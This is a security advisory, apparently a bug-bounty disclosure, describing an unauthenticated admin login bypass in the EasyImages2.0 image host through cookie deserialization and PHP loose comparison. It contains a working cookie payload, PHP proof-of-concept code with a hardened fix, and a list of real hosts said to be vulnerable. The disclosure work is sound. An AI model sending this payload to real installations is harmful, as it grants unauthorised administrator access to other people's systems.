Simple image hosting system (EasyImages) has a deserialization vulnerability and a weak type comparison vulnerability in icret/easyimages2.0

Valid

Reported on

Mar 2nd 2023


Description

The simple image hosting application (EasyImages2.0) has a deserialization vulnerability and a weak type comparison vulnerability that chain into an unauthenticated administrator login.

Proof of Concept

At line 129 of the code shown below there is a deserialization sink: the auth cookie is passed straight to unserialize() and the result is stored in $browser_cookie. The client fully controls that cookie, so the basic precondition for a deserialization attack (attacker-controlled input reaching the deserialization call) is met. The next step is to find a way to turn it into something useful.

$browser_cookie = unserialize($_COOKIE['auth']);

The deserialized value is then compared against the configured user name and password, which are the user and password entries in /config/config.php:

if ($browser_cookie[0] == $config['user'] && $browser_cookie[1] == $config['password']) return json_encode(array('code'  => 200, 'level' => 1, 'messege' => 'Esteemed Administrator '));

The comparison uses ==, PHP's loose comparison operator.

PHP weak type comparison

The stored password is an MD5 hash, i.e. a string. Because the cookie can be forged, we can make the password element of the deserialized array the integer 0 instead of a string. The comparison then becomes

0 == 'e6e061838856bf47e1de730719fb2609'

an integer compared with a string. Before PHP 8, a non-numeric string is converted to the integer 0 for such a comparison, so the expression is always true no matter what the hash is. (PHP 8 changed this rule: an integer compared with a non-numeric string is now compared as strings, so the bypass depends on the target running PHP 7 or earlier.)

Deserialization plus weak type comparison therefore yields an administrator login without knowing the password.

Payload

Set the auth cookie to the following value. It is the URL-encoded PHP serialization a:2:{i:0;s:5:"admin";i:1;i:0;}, i.e. a two-element array whose first element is the string admin and whose second element is the integer 0:

auth=a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22admin%22%3Bi%3A1%3Bi%3A0%3B%7D

Some examples of affected instances: https://pic.xmmup.com/ http://119.91.208.4/ https://pic.feixun.network/ http://42.194.169.37/ http://49.235.237.20/ http://124.223.203.248:8890/ http://47.98.184.192:8086 http://43.143.232.243:8080/ http://81.68.94.236:1025 http://img.143wu.top/

We then request /admin/admin.inc.php with this auth cookie set, and the check above returns the code 200 / level 1 administrator response.
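The chain above, as an added example (not code from the original report nor from the EasyImages project): it builds the cookie exactly as the payload section does, runs it through a stand-in of the vulnerable check, and then shows a hardened version of the same check. The $config array, the hash value and the function names auth_check() and auth_check_fixed() are constructed for this example; the hardened variant is an editor's suggestion, not the fix the project shipped in 2.6.7.

```php
<?php
// Added example, not part of the original report or of EasyImages' code.
// It reproduces the two primitives the report chains together: unserialize()
// on an attacker-controlled cookie, and PHP's loose "==" comparison against
// the stored MD5 password hash. It then shows a hardened check.

// Constructed stand-in for /config/config.php. The password is stored as an
// MD5 hex string, as the report describes; the value here is made up.
$config = [
    'user'     => 'admin',
    'password' => 'e6e061838856bf47e1de730719fb2609',
];

// 1. Build the cookie the way an attacker would: a two-element array whose
//    second element is the integer 0, serialized and URL-encoded. This yields
//    a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22admin%22%3Bi%3A1%3Bi%3A0%3B%7D, the
//    same value as the report's payload.
$forgedCookie = rawurlencode(serialize(['admin', 0]));

// 2. Vulnerable check, modelled on the report: unserialize() the cookie and
//    compare with "==". PHP decodes cookies for you on a real request; here
//    urldecode() emulates what $_COOKIE['auth'] would contain.
function auth_check(array $config, string $cookie): bool
{
    $browser_cookie = unserialize(urldecode($cookie));
    // On PHP 7.x the second comparison is  0 == '<md5 hex>', which is true
    // because the non-numeric string is cast to 0. On PHP 8.0+ int vs
    // non-numeric string is compared as strings, so the same cookie fails.
    return $browser_cookie[0] == $config['user']
        && $browser_cookie[1] == $config['password'];
}

// 3. Hardened check (editor's suggestion). Never hand unserialize() a value
//    the client controls; a JSON array carries the same data with no object
//    injection surface. Require both fields to be strings, compare with
//    "===", and compare the hash in constant time with hash_equals().
function auth_check_fixed(array $config, string $cookie): bool
{
    $browser_cookie = json_decode(urldecode($cookie), true);
    if (!is_array($browser_cookie)
        || !isset($browser_cookie[0], $browser_cookie[1])
        || !is_string($browser_cookie[0]) || !is_string($browser_cookie[1])) {
        return false;
    }
    return $browser_cookie[0] === $config['user']
        && hash_equals($config['password'], $browser_cookie[1]);
}

// Forged cookie against the vulnerable check: passes on PHP < 8, fails on
// PHP >= 8 (see the comment inside auth_check()).
var_dump(auth_check($config, $forgedCookie));

// Forged cookie (integer 0 as password) against the hardened check: always
// rejected, because the password field is not a string.
var_dump(auth_check_fixed($config, rawurlencode(json_encode(['admin', 0]))));

// Legitimate cookie carrying the real hash against the hardened check: accepted.
var_dump(auth_check_fixed($config, rawurlencode(json_encode(['admin', $config['password']]))));
```

Run it with php on a 7.x and an 8.x interpreter to see the first var_dump() flip from true to false while the other two are stable; the type check in auth_check_fixed() is what removes the dependence on interpreter version, and replacing unserialize() with json_decode() removes the object injection sink even if the comparison were later weakened again.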

Impact

The PHP deserialization vulnerability (also known as PHP object injection), combined with the loose comparison against the stored password hash, lets anyone who can set the auth cookie obtain administrator privileges without knowing the password.

We are processing your report and will contact the icret/easyimages2.0 team within 24 hours. a month ago
We have contacted a member of the icret/easyimages2.0 team and are waiting to hear back a month ago
NCNIPC梅苑 modified the report a month ago

NCNIPC梅苑 (Researcher), a month ago:

"==" is not secure in PHP; "===" should be used instead.

icret validated this vulnerability a month ago

Thank you for your feedback. I hope you can continue to pay attention to the code. Thanks again!

NCNIPC梅苑 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
icret marked this as fixed in 2.6.7 with commit 95a6ca a month ago
icret has been awarded the fix bounty
This vulnerability will not receive a CVE
icret published this vulnerability a month ago